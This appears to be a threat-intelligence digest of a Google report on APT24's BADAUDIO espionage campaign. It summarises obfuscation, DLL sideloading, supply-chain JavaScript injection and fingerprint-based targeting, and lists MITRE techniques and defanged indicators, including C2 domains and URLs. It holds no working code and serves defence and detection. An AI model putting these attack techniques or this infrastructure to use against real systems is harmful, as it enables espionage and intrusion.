Threat Research

APT24’s Pivot to Multi-Vector Attacks | Google Cloud Blog

GoogleCloudIntel
APT24’s Pivot to Multi-Vector Attacks | Google Cloud Blog

Google Threat Intelligence Group (GTIG) details a three-year espionage campaign by PRC‑nexus actor APT24 that deploys a highly obfuscated first‑stage downloader called BADAUDIO to establish persistent access via strategic web compromises, supply‑chain abuse of a Taiwanese digital marketing firm, and targeted phishing. The report analyzes BADAUDIO’s control‑flow flattening, DLL sideloading, AES‑encrypted payload delivery (including Cobalt Strike Beacon instances), advanced browser fingerprinting for tailored targeting, and shares IOCs and YARA rules to aid detection and mitigation. #APT24 #BADAUDIO

Keypoints

  • GTIG attributes a multi‑year, adaptive espionage campaign to APT24 that centers on the custom first‑stage downloader BADAUDIO to establish persistent network access.
  • BADAUDIO is heavily obfuscated using control‑flow flattening, collects basic host info, encrypts it with a hard‑coded AES key, and sends it in a cookie to retrieve and decrypt a staged payload in memory.
  • Execution commonly leverages DLL Search Order Hijacking and sideloading via legitimate executables, with delivery as encrypted archives containing DLLs plus VBS, BAT, and LNK files to automate placement and persistence.
  • Delivery vectors evolved from opportunistic strategic web compromises (malicious JS with FingerprintJS) to targeted supply‑chain compromises of a regional Taiwanese marketing firm and spear‑phishing using cloud storage links.
  • GTIG observed Cobalt Strike Beacon as a decrypted second‑stage payload in at least one instance, including a unique watermark tied to prior APT24 activity, and provided YARA rules to detect BADAUDIO variants.
  • GTIG mitigated the campaign by blocklisting identified sites, notifying victims and the compromised vendor, developing detection logic for modified scripts, and publishing technical indicators and rules.

MITRE Techniques

  • [T1574.001 ] DLL Search Order Hijacking – BADAUDIO is delivered as a malicious DLL that leverages DLL search order hijacking to execute via legitimate applications (‘BADAUDIO typically manifests as a malicious Dynamic Link Library (DLL) leveraging DLL Search Order Hijacking’).
  • [T1195.001 ] Supply Chain Compromise: Software Component – APT24 injected malicious code into a widely used JavaScript library and used a typosquatted CDN to distribute it (‘injected the malicious script into a widely used JavaScript library (MITRE ATT&CK T1195.001) provided by the firm’).
  • [T1059.007 ] JavaScript – The actor dynamically loads and executes JavaScript libraries (jQuery, FingerprintJS2) to perform reconnaissance and deliver payloads (‘Dynamic Dependency Loading: The script dynamically loads legitimate jQuery and FingerprintJS2 libraries (MITRE ATT&CK T1059.007)’).
  • [T1059 ] Command and Scripting Interpreter – Highly obfuscated JavaScript was hidden in a modified JSON file and executed by a compromised script to conceal the final payload (‘the highly obfuscated script (MITRE ATT&CK T1059) was deliberately placed within a maliciously modified JSON file’).
  • [T1082 ] System Information Discovery – The adversary used FingerprintJS2 to collect browser and environment characteristics and generate an x64hash128 fingerprint for targeting (‘Advanced Fingerprinting: FingerprintJS2 is utilized to generate an x64hash128 browser and environmental fingerprint (MITRE ATT&CK T1082)’).
  • [T1041 ] Exfiltration Over C2 Channel – Reconnaissance data (host, URL, useragent, fingerprint, referrer, time, identifier) was POSTed in Base64 to attacker endpoints to stage and validate targets (‘A POST request, transmitting Base64-encoded reconnaissance data … is sent to an attacker’s endpoint (MITRE ATT&CK T1041)’).
  • [T1105 ] Ingress Tool Transfer – Successful C2 responses provided URLs for dynamically loading subsequent scripts that redirected to BADAUDIO landing pages (‘Successful C2 responses trigger the dynamic loading of a subsequent script from a URL provided in the response’s data field … (MITRE ATT&CK T1105)’).
  • [T1189 ] Drive‑by Compromise (Strategic Web Compromise) – The campaign weaponized legitimate websites with injected JavaScript to selectively serve malicious content to Windows visitors (‘strategic web compromise (MITRE ATT&CK T1189) to a single domain’).

Indicators of Compromise

  • [File Hashes ] Malicious JavaScript and BADAUDIO binaries – 88fa2b5489d178e59d33428ba4088d114025acd1febfa8f7971f29130bda1213, 9ce49c07c6de455d37ac86d0460a8ad2544dc15fb5c2907ed61569b69eefd182, and 16 more hashes
  • [Domains ] Compromised hosting and C2 infrastructure – www[.]twisinbeth[.]com, wispy[.]geneva[.]workers[.]dev, and 15 more domains used for staging and C2
  • [C2 Request Path / URL ] Example C2 request and staged payload path – https://wispy[.]geneva[.]workers[.]dev/pub/static/img/merged?version=65feddea0367
  • [Cloud Storage Links ] Encrypted archive distribution – Google Drive and OneDrive links were abused to host encrypted archives containing BADAUDIO (blocked/diverted by Google protections)
  • [Cobalt Strike Watermark ] Beacon identifier – Watermark_Hash: BeudtKgqnlm0Ruvf+VYxuw== (unique watermark observed in a Cobalt Strike Beacon tied to APT24 activity)

Read more: https://cloud.google.com/blog/topics/threat-intelligence/apt24-pivot-to-multi-vector-attacks/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint